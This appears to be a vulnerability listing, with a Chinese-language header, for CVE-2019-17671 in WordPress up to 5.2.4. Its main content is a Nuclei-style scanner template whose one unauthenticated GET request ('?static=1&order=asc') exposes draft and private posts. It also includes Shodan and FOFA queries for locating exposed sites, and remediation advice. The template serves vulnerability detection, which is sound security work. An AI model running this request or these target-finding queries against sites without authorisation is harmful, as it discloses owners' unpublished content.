漏洞描述
WordPress before 5.2.4 contains an information disclosure caused by mishandling of the static query property, letting unauthenticated users view certain content, exploit requires no authentication.
CVE-2019-17671: WordPress <= 5.2.4 - Unauthenticated View Private/Draft Posts
PoC代码[已公开]
id: CVE-2019-17671
info:
name: WordPress <= 5.2.4 - Unauthenticated View Private/Draft Posts
author: 0x_Akoko
severity: medium
description: |
WordPress before 5.2.4 contains an information disclosure caused by mishandling of the static query property, letting unauthenticated users view certain content, exploit requires no authentication.
impact: |
Unauthenticated users can view restricted content, leading to information disclosure.
remediation: |
Update to WordPress 5.2.4 or later.
reference:
- https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-523-security-and-maintenance-release.html
- https://core.trac.wordpress.org/changeset/46474
- https://nvd.nist.gov/vuln/detail/CVE-2019-17671
- https://seclists.org/bugtraq/2020/Jan/8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-17671
cwe-id: CWE-200
epss-score: 0.82836
epss-percentile: 0.99222
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.component:"wordpress" http.html:"status-draft"
fofa-query: body="Wordpress" && body="status-draft"
tags: cve,cve2019,wp,wordpress,unauth,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/?static=1&order=asc"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'type-page status-draft'
- 'type-post status-draft'
condition: or
- type: regex
part: body
regex:
- 'class="[^"]*entry-title[^"]*"[^>]*>[^<]{3,}'
- 'WordPress ([0-4]\.|5\.[0-2]\.|5\.2\.[0-3])'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402203e51bc587d75f8e9d3352907fb0c202bc4aa47d33b1f4f670c95153b1f595f9f022047b7e4b29ca65b13dd30386d2a4f8203d11a71e088ddb655ac9dd58204fb6ddd:922c64590222798bb761d5b6d8e72950